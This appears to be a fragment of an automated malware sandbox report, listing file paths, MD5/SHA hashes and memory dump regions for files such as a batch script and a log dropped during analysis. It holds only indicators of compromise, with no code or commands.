SHA512 bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

C:\programdata\20250223024744\Ensup.log

MD5 2fd94f6e1d71454d716a126f0d7450ac
SHA1 5d966df95c741880089e9078af921a22216516ec
SHA256 a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

C:\Users\Public\Downloads\20250223024744\fhq.bat

MD5 3a7cb580bd340505f6dc5b4c829a3eca
SHA1 21cc730517d74fa1d13316d7e0d817f3bd710906
SHA256 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512 c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

memory/2768-93-0x00000000004D0000-0x00000000004F9000-memory.dmp

memory/2360-99-0x0000000003EA0000-0x00000000042B4000-memory.dmp

memory/2360-98-0x00000000042C0000-0x00000000046D9000-memory.dmp

memory/544-105-0x000000001B620000-0x000000001B902000-memory.dmp

memory/544-106-0x00000000027F0000-0x00000000027F8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38267d023abd6bf6c8425b2bc43be18a
SHA1 58f70c76e62487e0ec7c66a0ebb2efadcc698f8b
SHA256 e9e94a30b36ca3fe3f93ecccbd53cb822c0c21cb41515a7d447f461558704de1
SHA512 e668f7c113938bf165ee0bc02b006dc2311085208962fa5b5a80f92487538db3684413c475119cd4b6a4900b2f07cfc84b2a44c0382d3e02cb30bf66fd8c8b7b